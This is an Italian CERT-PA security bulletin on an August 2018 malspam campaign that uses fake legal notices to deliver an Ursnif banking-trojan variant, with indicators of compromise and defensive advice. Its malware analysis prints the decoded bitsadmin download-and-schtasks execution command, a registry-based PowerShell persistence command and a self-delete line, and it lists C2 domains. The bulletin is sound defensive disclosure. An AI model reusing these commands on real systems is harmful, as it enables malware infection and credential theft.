Massiva campagna di malspam Italiana con finti riferimenti a sentenze e contenuti giuridici - Variante del trojan bancario Ursnif -

Dimensione: px
Iniziare la visualizzazioe della pagina:

Download "Massiva campagna di malspam Italiana con finti riferimenti a sentenze e contenuti giuridici - Variante del trojan bancario Ursnif -"

Transcript

1 Massiva campagna di malspam Italiana con finti riferimenti a sentenze e contenuti giuridici - Variante del trojan bancario Ursnif - ID: CERT-PA-B Data: 08/08/2018 AVVERTENZE Il documento ha lo scopo di fornire alle Amministrazioni accreditate il quadro di riferimento degli scenari di minaccia rilevati dal CERT-PA, al fine di consentire loro di avviare tempestivamente valutazioni di impatto sui propri sistemi implementare le misure di contrasto/contenimento dei rischi correlati. informativi e Il CERT-PA, nell erogare al meglio questo servizio, si avvale di propri fornitori e di fonti pubbliche disponibili in Rete, individuati e selezionati tra i più autorevoli organismi di sicurezza, aziende specializzate e fornitori di tecnologie, al fine di garantire alla comunità di riferimento con la massima accuratezza, affidabilità e tempestività possibile le informazioni utili per la prevenzione e la gestione degli incidenti di sicurezza informatica. Non è consentito far uso di queste informazioni per finalità differenti da quelle sopra indicate. La presenza di rinvii operati mediante tecniche di ipertesto (link) non costituisce una raccomandazione del CERT-PA verso il soggetto richiamato, ma unicamente uno strumento per facilitare il rapido recupero di informazioni utili.

2 Indice Sommario Campagna di malspam Italiana con finti riferimenti e contenuti giuridici... 2 Esempi di veicolate... 3 Catena di infezione... 4 Analisi malware... 6 Indicatori di compromissione Misure di prevenzione e contrasto Conclusioni CERT-PA-B

3 Sommario Questa sezione contiene l elenco delle minacce oggetto del bollettino. Dalle segnalazioni e dal monitoraggio delle fonti, il CERT-PA ha evidenziato le seguenti minacce: 1. Campagna di malspam Italiana con finti riferimenti e contenuti giuridici A partire dal primo giorno di Agosto 2018, il CERT-PA ha rilevato una campagna di malspam rivolta verso utenze italiane ed, in particolare, verso caselle su domini di posta riferibili a strutture della PP.AA. Dal monitoraggio degli eventi connessi alla campagna e dalle analisi svolte sui campioni, direttamente o meno pervenuti, sono emerse evidenze tali da ritenere tale campagna tra le più vaste osservate, meticolosamente realizzate e pianificate quindi, almeno stando all utimo periodo, rilevanti in termini generali di pericolosità. La modalità di distribuzione ha coinvolto, nel giro di più giorni, non meglio specificate e quantificate caselle di destinazione, con modalità che variano di caso in caso. La finalità degli autori è quella di utilizzare una finta comunicazione, personalizzata e di natura legale, sperando di far presa su malcapitati utenti quindi riuscire a compromettere il sistema operativo installando una variante del trojan bancario Ursnif. Considerati alcuni elementi emersi nel corso delle indagini, tra cui la modalità di attuazione della campagna di malspam, la caratteristica catena di infezione adottata e le specifiche del malware, è plausibile supporre che l intento ultimo degli autori non abbia finalità strettamente, o unicamente, legate alla logica di utilizzo nativa di Ursnif. CERT-PA-B

4 Esempi di veicolate Di seguito, a titolo di esempio, si riportano alcuni dei principali messaggi rilevati a partire dal giorno 1 agosto 2018: CERT-PA-B

5 In tutti i casi osservati l utente destinatario riceve un testo apparentemente inviato da un fantomatico legale. Il messaggio invita, facendo leva sull oggetto e sul contenuto della , a visualizzare dei documenti in riferimento ad ipotetici atti o sentenze che sono resi disponibili tramite un collegamento internet. Il testo dei messaggi è, per lo più, correttamente scritto in italiano e riporta indicazioni di contesto non veritiere, tra cui la locazione dell avvocato scrivente e un numero di partita IVA che, da verifica a campione, non risulta associato ad alcuna entità reale. Altra caratteristica comune è che i messaggi vengono inviati singolarmente in modo da personalizzare la comunicazione. Gli autori della campagna infatti, tramite un inusuale dicitura d invito ad instaurare una comunicazione tra le parti, riportano, nel corpo del messaggio, la casella di posta del destinatario. Dalle casistiche monitorate la campagna in oggetto ha coinvolto sia utenze di posta elettronica ordinaria che quella di posta certificata, ove queste ultime siano abilitate alla ricezione di messaggi da caselle non C. Catena di infezione La catena di infezione può essere avviata solo tramite l interazione dell utente che, dando seguito all apertura del collegamento internet, acconsente allo scaricamento locale di un file archivio in formato zip. Il download dell'allegato avviene previo controllo dello user agent solo se la richiesta HTTP proviene da sistemi operativi basati su Microsoft Windows. Tentando l'apertura del collegamento da sistemi operativi differenti si otterrà una pagina web, apparentemente vuota, contenente un solo carattere speciale come di seguito raffigurato: Dalle analisi effettuate, su un numero cospicuo di casi, il CERT-PA ha identificato che, tramite la campagna, vengono diffusi tre differenti archivi denominati: Nuovo doc1.zip Nuovo doc2.zip Nuovo doc3.zip CERT-PA-B

6 I file archivio scaricati, pur utilizzando la stessa nomenclatura variano nel contenuto di volta in volta, ed in tutti i casi verificati l archivio scaricato contiene: un file immagine.jpg con nomi variabili, avente scopo di diversivo, e contenente riferimenti generici di un documento informatico artt. 20 e 21 un file malevolo con estensione.vbs che, se eseguito, è incaricato di avviare la catena di infezione. Di seguito l immagine del contenuto dell archivio Nuovo doc3.zip : Di seguito il contenuto del file immagine: CERT-PA-B

7 Analisi malware Osservando le varie fasi della catena di infezione, il CERT-PA ha provveduto ad analizzare le componenti malevole scaricate dal malware. Facendo distinzione tra tre casi di seguito indicati, si riporta il contenuto dell analisi svolta. Caso 1 Nome file: Nuovo doc1.vbs : fe c599631a697df99c5cf2ae9 SHA1: c eced61e4adb f5 Caso 2 : fc374f10e21986ceba020bdcc f7e18b429984e47fe3b Analisi Infosec: Nome file: Nuovo doc2.vbs : 8e7ebcbe0d1659d6e5b9ce9ee419727f SHA1: ea311e86b94391d11682d66371ab95a Caso3 : c544bf4d2d44c6807ad93ebc9feb2bc1c67474d4f8ef5c7d783113a0c75a1 Analisi Infosec: Nome file: Nuovo doc3.vbs : ac975eb0234f4d77903e91b8f SHA1: 13ee23fd9bdd73a358b4d835a4a723fb54658f83 : e8e9e2b14f621e4605d af590aa4c967d04fb05c323c be272 Analisi Infosec: Partendo dall'analisi di quest ultimo codice VBScript è emerso che il file VBS, una volta decodificato, provvede a lanciare il comando seguente: "cmd.exe /c bitsadmin /transfer msd5 /priority foreground %TEMP%/pwwnYfCXsO.exe &schtasks /create /st 10:11:10:11 /sc once /tn srx3 /tr %TEMP%/pwwnYfCXsO.exe Il comando avvia "bitsadmin" il quale provvede a scaricare localmente il file "pwwnyfcxso.exe" dalla risorsa " quindi fornisce parametri al processo di Windows "schtasks.exe" per programmare temporalmente l'esecuzione del file malevolo di seguito caratterizzato: CERT-PA-B

8 Nome file: pwwnyfcxso.exe : a6a67a19f7088a7dcabcffec3f9efdb4 SHA1: 7f3e58b7076c4df30e3db48e1b4a89eb4c7e237a : 7a17fd961eba4607e333c6d33d7db4bcd2019c353626f43a49231df00f6f408a Import hash: b274db88bb28fec6c04116af2b3c2263 Analisi Infosec: Di seguito una rappresentazione grafica dei processi invocati dal file.vbs: Da aggiuntive analisi sul file è emerso un ulteriore file integrato al precedente con una tecnica simile al "process hollowing" e di cui si riportano i dettagli: Nome file: payload_dump.exe : b32c067e2dec033cfc9a92c2a SHA1: fc54565f0b195bea36db7ef3e0f979b3618aad81 : fd615d82e c305cd0d9c57bed6fb7e771c3b05019d9c1f13b Import hash: c28444ce e29e35265dea61cc Analisi Infosec: NOTA: Tramite ricerche di tipo CLOSINT emerge che in relazione agli import hash sopra indicati emergono recenti "sample" associati alle tipologie di malware Ursnif e GandCrab. Dall analisi del malware risulta che, una volta decifrati i propri dati, è in grado di cambiare le impostazioni di Internet Explorer affinché non mostri finestre di benvenuto e di conferma al download dei file. In questo modo il malware può scaricare file senza essere notato dall utente. Il malware raccoglie informazioni come il nome utente e il tempo dall'avvio della macchina, queste sono poi trasformate in una query HTTP; di seguito un esempio ottenuto dalla macchina di analisi: soft=3&version=217016&user=d8a80f0c c66de827b &server=12&id=1345&crc=1&uptime=86236 Questa stringa, dopo minori manipolazioni, è poi codificata con un algoritmo ed usata per generare l'url da scaricare dei componenti aggiuntivi. Sono effettuate in totale tre richieste. Di seguito un esempio: CERT-PA-B

9 razizhe/uosufowutnnr/nbzp8yyhp9e/ot1n_2ffnczjt9/g84imohunegreffn3q5ti/1z4x1otbrk3av6nu/bhg3wome n9kah3r/jvjpprc8ec6rw0_2f/lcggjc.avi Ognuna di queste richieste scarica un file con estensione AVI ma il cui contenuto è un blob binario codificato in base64, una volta decodificati essi sono stati identificati come: una DLL a 32 bit, la stessa DLL compilata a 64 bit e uno script PowerShell. La DLL corrispondente alla versione del sistema operativo in uso viene modifica per essere iniettata in un processo ospite, lo script PowerShell viene alterato per inserirvi la DLL così modificata. Il malware genera due stringhe casuali a partire dai nomi delle librerie presenti nel sistema ed utilizza tali nomi per creare le chiavi di registro: HKLM\Software\Microsoft\Windows\CurrentVersion\Run\<StringaCasuale> HKCU\Software\AppDataLow\Software\Microsoft\<GUIDCasuale>\<StringaCasuale> HKCU\Software\AppDataLow\Software\Microsoft\< GUIDCasuale>\Client32 HKCU\Software\AppDataLow\Software\Microsoft\< GUIDCasuale>\Client64 Le ultime due chiavi contengono i payload scaricati in formato cifrato, la seconda contiene lo script PowerShell modificato. La prima è il metodo di persistenza usato dal malware, essa contiene il comando: cmd.exe /C powershell invoke-expression([system.text.encoding]::ascii.getstring((get-itemproperty 'HKCU:\\Software\\AppDataLow\\Software\\Microsoft\\<GUIDCasuale>').<StringaCasuale>)) Infine, il malware cancella se stesso con il comando ping localhost -n 10 && del {percorso_malware} e termina. La catena di infezione prosegue al riavvio della macchina, il comando sopra porta all esecuzione di codice PowerShell che inietta la DLL scaricata nel processo padre (in questo caso explorer.exe). L analisi di questa DLL ha rilevato che il malware utilizza, per salvare i propri dati, la cartella di registro: HKCU\Software\AppDataLow\Software\Microsoft\ E utilizzato, ma non necessariamente creato, un numero consistente di sotto chiavi (Come Vars, Files, Run, Config, Src e GUID casuali) per cui la presenza di queste è un forte indicatore di compromissione. Il malware crea vari Thread di esecuzione ognuno finalizzato alla continua cattura di informazioni: vengono enumerati gli account di Outlook, gli account dei prodotti Mozilla (Firefox, Thunderbird, ), vengono CERT-PA-B

10 registrati i dispositivi rimovibili inseriti nel computer, viene infettato Chrome, viene installato un keylogger, viene recuperato l indirizzo IP esterno e vengono contattati i seguenti domini: Bradisdns.ru Pabertam.com Pool.erinwolfedoyle.com Next.gardenforyou.org Updomo.com Bizinua.com Utilizzando query HTTP GET con formato identico a quello descritto precedentemente ma con l aggiunta del parametro ip. CERT-PA-B

11 Indicatori di compromissione Di seguito si riportano gli indicatori rilevati dalle dirette osservazioni ed analisi oltre a quelli ad essi associabili Indicatori di compromissione Domini mittente utilizzati saybees.com sfdscf.com dasayf.com sfsheriffactivityleague.com Drop URL univoche identificate IoC Malware URL download payload Domini C&C bradisdns.ru pabertam.com pool.erinwolfedoly.com next.gardenforyou.org updomo.com bizinua.com CERT-PA-B

12 IP C&C 195[.] IoC Malware associati a quelli rilevati nella campagna descritta. Malware Ursnif associato all'ip 195[.] : Data rilevamento 08/07/ f4594b3a72779c6f5fc008a4fdf8e2ffa151c88dd94cb91415b6f4b13e874 aa50bc7ff7ab6cfcfdb89bb8a981c434 Data rilevamento 08/07/2018 2ba41081e00f48e19e0a7f1240e80f5334eeed43aa56f3da14334b210ac4ab4d e3c71d05a cdbd7e1b3f5df03 Data rilevamento 08/03/2018 cfba4172e6c5ad06ad84ae093ae97deb6d35f0fc9b72b02e7357a6b7a5685da5 c3ce3a7a9ecf94cea45a3e402f871d8b Data rilevamento 08/03/ f08bd14a a5eb9df9e6010dc1d939e0e5c754a301a6b015e0a8ed74e 3a b46ae2e6400d8e22e4129d Malware Ursnif associato al dominio bradisdns.ru: Data rilevamento 08/07/ f4594b3a72779c6f5fc008a4fdf8e2ffa151c88dd94cb91415b6f4b13e874 aa50bc7ff7ab6cfcfdb89bb8a981c434 Data rilevamento 08/07/2018 2ba41081e00f48e19e0a7f1240e80f5334eeed43aa56f3da14334b210ac4ab4d e3c71d05a cdbd7e1b3f5df03 Data rilevamento 08/03/2018 cfba4172e6c5ad06ad84ae093ae97deb6d35f0fc9b72b02e7357a6b7a5685da5 c3ce3a7a9ecf94cea45a3e402f871d8b CERT-PA-B

13 Data rilevamento 08/03/ f08bd14a a5eb9df9e6010dc1d939e0e5c754a301a6b015e0a8ed74e 3a b46ae2e6400d8e22e4129d Data rilevamento 08/02/ d cbf60a8c2daba404499b68e75186f088d4a89cb308e d2c3 d59b3d bf277684c42fcc69 Data rilevamento 08/02/ c479303cf eb6b95a0989aa1f4cfa21cf706d02e bb0d1 a0e4a9c661a9a45cfb6e6abb4ad36723 Data rilevamento 08/02/2018 b879cd e41807eef3c b3db08b5e5741ca8dc4e442bc2 8e9c012abec8bb7e76114e608eada3e1 Data rilevamento 08/02/2018 3cab9ffb906e622d8b7a56b10def16e6feffa2f6a c0fa7b8f764674a 630d6a3528f654c852cb84a5e Data rilevamento 08/02/ ecfdce4524d821ec2a83e32cead0fd8a783814cfd2921d0d915e64c113bba5 07e9cb7f5bd6ba001c21ebf1baeb9eaa Malware di varie tipologie associato all'import Hash b274db88bb28fec6c04116af2b3c2263 Data rilevamento 08/06/2018 a54609ed775fab ce17aa4d68675bb35af0012d361ffcb4bbb249e5a e46eaf49e5b00b54dde42879ebbd1ffb Data rilevamento 08/04/2018 bcda43d2010b44a8cb1a271eb6b02d0043c453f3d393868fbdbe214f8c7b5039 2a48174d48bec54c734230bdb4c44dba CERT-PA-B

14 Data rilevamento 08/03/ ec58795aaed0e4fe6a3fbb8031d9ba7c3899d5d80e1241ecd68ccf3b300 d071449bec f1b9b0a87d1def8 Data rilevamento 08/03/ b6014a444db1208e41ef17b3a739b659eeaa8e493f135f62e90673a1cfc555 29e30c4aa7ff023046d920aef9d85233 Data rilevamento 08/03/ b6014a444db1208e41ef17b3a739b659eeaa8e493f135f62e90673a1cfc555 29e30c4aa7ff023046d920aef9d85233 Data rilevamento 08/03/2018 1baaa425c2a3e35df5dbc164863abbe7fc92110ccea887f245ae4bd7a6b351c0 b78f5fc367d6103a033e829c3d38ea1c Malware di varie tipologie associato all'import Hash c28444ce e29e35265dea61cc Data rilevamento 08/03/2018 cfba4172e6c5ad06ad84ae093ae97deb6d35f0fc9b72b02e7357a6b7a5685da5 c3ce3a7a9ecf94cea45a3e402f871d8b Data rilevamento 07/30/2018 d2b9c0f765f12c400157ace2c38e013ac915e7824beb230e1dc9725d2fe25d45 1a78b23a8d09d0115f9f46ef92a20c76 Data rilevamento 07/30/ b468f21f c80f6a3ea16a60a1d179c97268c72433c3a28e75 f09fed26c29c4d491a4306bb42fc4b4f CERT-PA-B

15 Misure di prevenzione e contrasto Il fattore di rilevamento dei file.vbs, rilevanti durante l esercizio della campagna, è pressochè nullo da parte degli antivirus. Inoltre i sistemi di sicurezza potrebbero non identificare i carichi malevoli (payload) che vengono scaricati dal client per mezzo dei domini utilizzati nell infrastruttura network della campagna. Non si hanno dirette evidenze relativamente alla capacità, da parte del malware analizzato, di contattare le risorse esterne, quali il server di C&C, tramite un server proxy. Dalle analisi svolte, in relazione a funzioni rilevate allo scopo di identificare la configurazione di IE, riteniamo comunque possibile tale circostanza. I domini utilizzati dagli autori della campagna per scaricare l'archivio zip (drop url) non sono, nel recente passato, stati utilizzati in ulteriori eventi di diffusione malware e, nella maggior parte dei casi, non sono categorizzati (web reputation). Trattandosi di una campagna di malspam estremamente variabile in relazione alla casella mittente, oggetto, corpo del messaggio, drop url e del file.vbs, le misure di contrasto possono essere applicate in base alle possibilità offerte dalle tecnologie di sicurezza in uso. In generale si consiglia: 1. lato server di posta Attivare un filtro per i domini mittente indicati e/o filtrare i messaggi in arrivo che contengano nell oggetto la dicitura "Relata notifica decreto", "Relazione di notifica sentenza", "Relazione notifica decreto", "Relata di notifica decreto" 2. lato client e policy AD Una soluzione ove possibile valida contro la diffusione del malware, non legata alle firme Antivirus, è quella di bloccare il traffico in uscita del processo "bitsadmin.exe" verso destinazioni internet non note. Ulteriori suggerimenti, da valutare lato end-point, richiamano all'attuazione di specifiche politiche di controllo e restrizioni sulle funzionalità di Windows tra cui: Criteri di restrizione software (applicabile a Windows 8 e 8.1, Windows Server 2012 R2 e 2012) Windows AppLocker (applicabile a Windows 7 e Windows Server 2008 R2) CERT-PA-B

16 Conclusioni La campagna indicata, in ordine a quelle notate nel corso degli ultimi mesi a danno di utenze Italiane, utilizza importanti risorse e più sofisticate tecniche per colpire i destinatari. Analisi indirizzate ad identificare se le caselle coivolte fossero esposte in dump noti non hanno dato esito positivo. Dagli elementi raccolti è plausibile ritenere che tale malware possa essere diffuso con l intento di infettare, più o meno, specifici bersagli e condurre ulteriori azioni che potrebbero non essere strettamente legate alle caratteristiche del malware bancario Ursnif, ma utilizzarne le spefiche funzionalità, per attività malevole ad ampio spettro. Dalle ultime evidenze dirette raccolte dal CERT-PA, gli eventi risalgono al pomeriggio di ieri, 7 agosto 2018, pertanto riteniamo che la campagna sia ancora in corso. Si prega di fornire risconto al CERT-PA (cert-pa@cert-pa.it con riferimento al codice CERT-PA-B del bollettino) in caso di rilevazione degli indicatori di compromissione indicati o se la campagna risultasse in atto verso i Vs domini di riferimento. Analisi sul malware ed indagini sul caso sono in corso, il CERT-PA fornirà aggiornamenti qualora rilevate informazioni rilevanti. CERT-PA-B

ID: CERT-PA-B Data: 09/12/2015

ID: CERT-PA-B Data: 09/12/2015 Bollettino: Nuova variante Cryptolocker ID: Data: 09/12/2015 AVVERTENZE Il documento ha lo scopo di fornire alle Amministrazioni accreditate il quadro di riferimento degli scenari di minaccia rilevati

Dettagli

ID: CERT-PA-B Data: 17/12/2015

ID: CERT-PA-B Data: 17/12/2015 Bollettino: Nuova variante Malware RAT ID: Data: 17/12/2015 AVVERTENZE Il documento ha lo scopo di fornire alle Amministrazioni accreditate il quadro di riferimento degli scenari di minaccia rilevati dal

Dettagli

ID: CERT-PA-B Data: 10/03/2016

ID: CERT-PA-B Data: 10/03/2016 Bollettino: Nuova variante Cryptolocker ID: Data: 10/03/2016 AVVERTENZE Il documento ha lo scopo di fornire alle Amministrazioni accreditate il quadro di riferimento degli scenari di minaccia rilevati

Dettagli

ID: CERT-PA-B Data: 27/07/2018

ID: CERT-PA-B Data: 27/07/2018 Campagna ursnif italiana ID: CERT-PA-B005-180727 Data: 27/07/2018 AVVERTENZE Il documento ha lo scopo di fornire alle Amministrazioni accreditate il quadro di riferimento degli scenari di minaccia rilevati

Dettagli

ID: CERT-PA-B Data: 29/07/2016

ID: CERT-PA-B Data: 29/07/2016 Bollettino: Nuovi IoC Ransomware Locky ID: CERT-PA-B023-160729 Data: 29/07/2016 AVVERTENZE Il documento ha lo scopo di fornire alle Amministrazioni accreditate il quadro di riferimento degli scenari di

Dettagli

ID: CERT-PA-B Data: 26/10/2017

ID: CERT-PA-B Data: 26/10/2017 Bollettino: Campagna Ransomware BadRabbit ID: Data: 26/10/2017 AVVERTENZE Il documento ha lo scopo di fornire alle Amministrazioni accreditate il quadro di riferimento degli scenari di minaccia rilevati

Dettagli

ID: CERT-PA-B Data: 20/10/2017

ID: CERT-PA-B Data: 20/10/2017 Bollettino: RAT Orcus ID: CERT-PA-B016-171020 Data: 20/10/2017 AVVERTENZE Il documento ha lo scopo di fornire alle Amministrazioni accreditate il quadro di riferimento degli scenari di minaccia rilevati

Dettagli

ID: CERT-PA-B Data: 29/12/2017

ID: CERT-PA-B Data: 29/12/2017 Bollettino: Statistiche vulnerabilità 2017 con dettaglio sui principali software ID: Data: 29/12/2017 AVVERTENZE Il documento ha lo scopo di fornire alle Amministrazioni accreditate il quadro di riferimento

Dettagli

ID: CERT-PA-B Data: 05/01/2016

ID: CERT-PA-B Data: 05/01/2016 Bollettino: Ransom32 JS ID: Data: 05/01/2016 AVVERTENZE Il documento ha lo scopo di fornire alle Amministrazioni accreditate il quadro di riferimento degli scenari di minaccia rilevati dal CERT-PA, al

Dettagli

ID: CERT-PA-B Data: 07/04/2016

ID: CERT-PA-B Data: 07/04/2016 Bollettino: Petya Ransomware ID: Data: 07/04/2016 AVVERTENZE Il documento ha lo scopo di fornire alle Amministrazioni accreditate il quadro di riferimento degli scenari di minaccia rilevati dal CERT-PA,

Dettagli

L'applicazione integrata con il servizio My Fattura

L'applicazione integrata con il servizio My Fattura L'applicazione integrata con il servizio My Fattura Come funziona einvoicemanger (eim) 2 Per il CICLO ATTIVO 2 Per il CICLO PASSIVO 2 Come può essere utilizzato 2 Installazione di eim 2 Installazione del

Dettagli

ID: CERT-PA-B Data: 20/03/2019

ID: CERT-PA-B Data: 20/03/2019 Bollettino: Campagna di malspam Gootkit indirizzata verso PEC italiane ID: CERT-PA-B001-190320 Data: 20/03/2019 AVVERTENZE Il documento ha lo scopo di fornire alle Amministrazioni accreditate il quadro

Dettagli

INFORMATIVA ESTESA SULL USO DEI COOKIE

INFORMATIVA ESTESA SULL USO DEI COOKIE INFORMATIVA ESTESA SULL USO DEI COOKIE Uso dei cookie bertolinipulizie.it o il Sito utilizza i Cookie per rendere i propri servizi semplici e efficienti per l utenza che visiona le pagine di bertolinipulizie.it.

Dettagli

Cookie di analisi di servizi di terze parti

Cookie di analisi di servizi di terze parti Questo documento spiega cosa sono i cookie e come vengono usati su questo sito. Uso dei cookie brunellograzia.it o il Sito utilizza i Cookie per rendere i propri servizi semplici e efficienti per l utenza

Dettagli

Analizzandoli in maniera particolareggiata i nostri cookie permettono di:

Analizzandoli in maniera particolareggiata i nostri cookie permettono di: Cookie policy Uso dei cookie Il "Sito" (tecnostampistoro.it) utilizza i Cookie per rendere i propri servizi semplici e efficienti per l utenza che visiona le pagine di tecnostampistoro.it. Gli utenti che

Dettagli

Informativa estesa sull uso dei cookie

Informativa estesa sull uso dei cookie Informativa estesa sull uso dei cookie Uso dei cookie Galaxie.it utilizza i Cookie per rendere i propri servizi semplici e efficienti per l utenza che visiona le pagine del sito. Gli utenti che visionano

Dettagli

Dopo aver installato WAMP (o XAMPP) e verificato che i servizi siano funzionanti, si può procedere ad installare ARTISWEB, come appresso descritto.

Dopo aver installato WAMP (o XAMPP) e verificato che i servizi siano funzionanti, si può procedere ad installare ARTISWEB, come appresso descritto. Procedura di installazione artisweb Preparazione dell ambiente ARTISWEB può girare su qualsiasi piattaforma che fornisca i seguenti servizi: - un server web locale (ad esempio: Apache ver.2.2 o successive,

Dettagli

Caselle di Posta Elettronica

Caselle di Posta Elettronica Ufficio Segreteria Caselle di Posta Elettronica Configurazione e abilitazione Note pratiche versione PI 06.02.00 Quando il testo è utile Il testo è utile quando si ha la necessità di configurare una nuova

Dettagli

Business Communications Manager e CallPilot 100/150

Business Communications Manager e CallPilot 100/150 Aggiornamenti per la Guida dell'utente di Desktop Messaging Business Communications Manager e CallPilot 100/150 Questa guida è un aggiunta alla Guida dell utente di CallPilot 5.0 Desktop Messaging e contiene

Dettagli

Procedura di installazione rrunnweb

Procedura di installazione rrunnweb Procedura di installazione rrunnweb Preparazione dell ambiente RRUNNWEB può girare su qualsiasi piattaforma che fornisca i seguenti servizi: - un server web locale (ad esempio: Apache ver.2.2 o successive,

Dettagli

Informativa estesa sull utilizzo dei cookie

Informativa estesa sull utilizzo dei cookie Informativa estesa sull utilizzo dei cookie Uso dei cookie AGCI TOSCANA utilizza i Cookie per rendere i propri servizi semplici e efficienti per l utenza che visiona le pagine del sito. Gli utenti vedranno

Dettagli

File Leggimi di Veritas System Recovery 16 Monitor

File Leggimi di Veritas System Recovery 16 Monitor File Leggimi di Veritas System Recovery 16 Monitor Informazioni sul file Leggimi Funzionalità non più supportate in Veritas System Recovery 16 Monitor Informazioni su Veritas System Recovery 16 Monitor

Dettagli

Analizzandoli in maniera particolareggiata i nostri cookie permettono di:

Analizzandoli in maniera particolareggiata i nostri cookie permettono di: Uso dei cookie Il "Sito" (antsrl.com) utilizza i per rendere i propri servizi semplici e efficienti per l utenza che visiona le pagine di antsrl.com. Gli utenti che visionano il Sito, vedranno inserite

Dettagli

Uso dei cookie. Informativa estesa sull uso dei cookie

Uso dei cookie. Informativa estesa sull uso dei cookie Informativa estesa sull uso dei cookie Uso dei cookie Psicoattivita.it o il Sito utilizza i cookie per rendere i propri servizi semplici e efficienti per l utenza che visiona le pagine di www.psicoattivita.it

Dettagli

Informativa estesa sull utilizzo dei cookie

Informativa estesa sull utilizzo dei cookie Cookie Policy Informativa estesa sull utilizzo dei cookie La presente cookie policy ha lo scopo specifico di illustrare i tipi, le modalità di utilizzo nonché di fornire indicazioni circa le azioni per

Dettagli

Software McAfee epolicy Orchestrator 5.9.0

Software McAfee epolicy Orchestrator 5.9.0 Note sulla versione Revisione B Software McAfee epolicy Orchestrator 5.9.0 Sommario Informazioni su questo rilascio Nuove funzionalità Miglioramenti Problemi noti Istruzioni per l'installazione Trova documentazione

Dettagli

04/04/2016 MANUALE DI ISTRUZIONI DELL APPLICAZIONE ENTRATEL-MULTIFILE VERSIONE 1.0.0

04/04/2016 MANUALE DI ISTRUZIONI DELL APPLICAZIONE ENTRATEL-MULTIFILE VERSIONE 1.0.0 04/04/2016 MANUALE DI ISTRUZIONI DELL APPLICAZIONE ENTRATEL-MULTIFILE VERSIONE 1.0.0 PAG. 2 DI 24 INDICE 1. PREMESSA 3 2. INSTALLAZIONE 4 3. STRUTTURA DELLE CARTELLE 8 4. CONFIGURAZIONE DELL APPLICAZIONE

Dettagli

Informativa estesa uso dei Cookie

Informativa estesa uso dei Cookie I sito web soluzionijava utilizza cookie e tecnologie simili per garantire il corretto funzionamento delle procedure e migliorare l'esperienza di uso delle applicazioni online. Il presente documento fornisce

Dettagli

Informativa estesa sull uso dei cookie

Informativa estesa sull uso dei cookie Informativa estesa sull uso dei cookie Uso dei cookie Questo Sito utilizza i Cookie per rendere i propri servizi semplici ed efficienti per il visitatore web che otterrà quantità minime di informazioni

Dettagli

Informativa sulla privacy di Norton Community Watch

Informativa sulla privacy di Norton Community Watch Informativa sulla privacy di Norton Community Watch In vigore dal: 5 agosto 1999 Ultimo aggiornamento: 16 aprile 2010 Che cos'è Norton Community Watch? Norton Community Watch consente agli utenti di prodotti

Dettagli

Classificazione: Pubblico Guida all installazione di una nuova versione di DigitalSign tramite Aggiornamento Automatico

Classificazione: Pubblico Guida all installazione di una nuova versione di DigitalSign tramite Aggiornamento Automatico Guida all installazione di una nuova versione di DigitalSign tramite Aggiornamento Automatico Guida all installazione di una nuova versione di DigitalSign tramite Aggiornamento Automatico Pagina 1 di 16

Dettagli

SHAREPOINT CONNECTOR PLUG-IN - short guide-

SHAREPOINT CONNECTOR PLUG-IN - short guide- SHAREPOINT CONNECTOR PLUG-IN - short guide- Aggiornato alla versione Boole Server 3.2.1.9 SHAREPOINT CONNECTOR PLUG-IN Sommario Installazione di Sharepoint Connector plug-in... 3 Utilizzo di Sharepoint

Dettagli

Rete Sicura Plus. Guida d installazione ed attivazione del servizio

Rete Sicura Plus. Guida d installazione ed attivazione del servizio Rete Sicura Plus Guida d installazione ed attivazione del servizio Come avviare l'installazione Per installare il prodotto, sono necessari: a. Una connessione internet b. Una chiave di abbonamento valida

Dettagli

Cookie Policy. Functionality Cookie

Cookie Policy. Functionality Cookie Cookie Policy Il sito web di Green Aus utilizza i Cookie per rendere i propri servizi semplici ed efficienti per l utenza che visita le pagine del portale. I Cookie sono file di testo, ovvero pacchetti

Dettagli

GUIDA ALL INSTALLAZIONE DI R CONTENUTO

GUIDA ALL INSTALLAZIONE DI R CONTENUTO GUIDA CONTENUTO In questa Guida verranno analizzati i vari passi all installazione del software Open Source R, sia per il Sistema Operativo Windows che MacOS. ALL INSTALLAZIONE DI R 2 Sommario 1. Sistema

Dettagli

SOLUTION OVERVIEW. Gestisci la sicurezza informatica della tua azienda da un unica console basata sul Cloud

SOLUTION OVERVIEW. Gestisci la sicurezza informatica della tua azienda da un unica console basata sul Cloud SOLUTION OVERVIEW Gestisci la sicurezza informatica della tua azienda da un unica console basata sul Cloud Con ESET Cloud Administrator è possibile gestire la sicurezza della rete aziendale senza dover

Dettagli

CORSO DI FORMAZIONE DOCENTI DELLE SCUOLE PUBBLICHE A GESTIONE PRIVATA ECDL, LA PATENTE EUROPEA PER L USO DEL COMPUTER GUIDA SINTETICA

CORSO DI FORMAZIONE DOCENTI DELLE SCUOLE PUBBLICHE A GESTIONE PRIVATA ECDL, LA PATENTE EUROPEA PER L USO DEL COMPUTER GUIDA SINTETICA M ECDL ECDL, LA PATENTE EUROPEA PER L USO DEL COMPUTER LA POSTA ELETTRONICA Parte Generale GUIDA SINTETICA 1 - Primi passi Aprire il programma di posta elettronica Outlook Express Aprire la cassetta delle

Dettagli

istruzioni per l'installazione

istruzioni per l'installazione istruzioni per l'installazione vers.11/11 INDICE 1 Cos è Magister Pag. 3 1a Requisiti di sistema Pag. 3 2 Installazione di Magister Pag. 3 3 Dopo l installazione di Magister Pag. 6 3a Aggiornamento da

Dettagli

Le presenti note si riferiscono esclusivamente alla procedura di installazione e di aggiornamento di Planet HR.

Le presenti note si riferiscono esclusivamente alla procedura di installazione e di aggiornamento di Planet HR. Planet HR: note per l aggiornamento e l installazione (Pagina 1:9) Premessa Le presenti note si riferiscono esclusivamente alla procedura di installazione e di aggiornamento di Planet HR. Accedere al sistema

Dettagli

Guida pratica all attivazione della componente applet per la firma digitale interna al portale VestaNET

Guida pratica all attivazione della componente applet per la firma digitale interna al portale VestaNET Guida pratica all attivazione della componente applet per la firma digitale interna al portale Aggiornamento al 09/02/2017 È stato introdotto il paragrafo di appendice, realizzato con la preziosa collaborazione

Dettagli

GfK Digital Trends. Manuale d'uso. Versione 15.3 settembre 2015 Italiano. GfK September 30, 2015 Software User Manual

GfK Digital Trends. Manuale d'uso. Versione 15.3 settembre 2015 Italiano. GfK September 30, 2015 Software User Manual GfK Digital Trends Manuale d'uso Versione 15.3 settembre 2015 Italiano 2 Benvenuto in GfK Digital Trends! Informazioni su GfK Digital Trends GfK Digital Trends è una app progettata per esplorare l'utilizzo

Dettagli

Queste note operative sono valide ESCLUSIVAMENTE dalla versione 2.90 di Metodo.

